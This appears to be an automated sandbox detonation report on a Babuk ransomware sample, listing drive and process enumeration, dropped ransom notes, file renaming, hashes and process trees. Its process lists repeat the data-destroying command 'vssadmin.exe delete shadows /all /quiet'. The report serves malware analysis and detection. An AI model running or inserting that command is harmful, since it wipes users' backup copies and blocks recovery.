File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2960 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2960 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2960 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2960 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2408 wrote to memory of 2428 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2408 wrote to memory of 2428 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2408 wrote to memory of 2428 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2960 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2960 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2960 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2960 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2176 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2176 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2176 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

N/A

Files

\Device\HarddiskVolume1\Boot\cs-CZ\How To Restore Your Files.txt

MD5 b6e97028103bc6b18214f4b2bd0e0d23
SHA1 4c202c77782d55af635c28fa71b2ba58b294415e
SHA256 db1c8cafdedfc4be8dd6b81aa086b998ae49ad929b8a260d4030c7b5ca373a45
SHA512 214f7e9354a76f031bc3d28c6c20b3d5fafed32e5cb2d7414b7c2d185637d2f47e3538b62c722ba8b018cb3e6e3d9ff11bd6437d3f2af8eca9cd8504eb8c0f7d

Analysis: behavioral6

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1584s

Max time network

1570s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (1641) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\How To Restore Your Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 58.189.79.40.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 112.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 19.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp

Files

\Device\HarddiskVolume1\Boot\da-DK\How To Restore Your Files.txt

MD5 b6e97028103bc6b18214f4b2bd0e0d23
SHA1 4c202c77782d55af635c28fa71b2ba58b294415e
SHA256 db1c8cafdedfc4be8dd6b81aa086b998ae49ad929b8a260d4030c7b5ca373a45
SHA512 214f7e9354a76f031bc3d28c6c20b3d5fafed32e5cb2d7414b7c2d185637d2f47e3538b62c722ba8b018cb3e6e3d9ff11bd6437d3f2af8eca9cd8504eb8c0f7d

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

MD5 7c39bb1f4920be2be02ae6ad4fefd614
SHA1 3fe56e7fcbde259aba45ad36c95265bb0d3746ab
SHA256 b5a0040ff5d4baccac5aff5b5fe8526f5846bf393ba6bc9c393f15a8a04a75ae
SHA512 1af7546ca3565087412d9640a81a20e51e0cc01c9399a0f602f72593e950715ac46a32de0b9e234e352debfb967a2c00bba8b711ae8dc7cfc3935d6e78107568

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

MD5 931cfaf9eaab8a1c9aaeeb81c308b20b
SHA1 61f5233b87497ca7db82b65cc8b7859543bf401a
SHA256 8860ba65755bc59c3068fd49262d3e95050741284a1969dd9b3aa45adf152b1b
SHA512 885d124cce3056bc2d4aa2669219d4b40249bb5eaec2630974763881ff3633d455582cc5a66697f96fdad2424ed7b20595c1793cd46c6b8acd5721fe3c1f53fd

Analysis: behavioral12

Detonation Overview

Submitted

2024-07-07 14:07

Reported

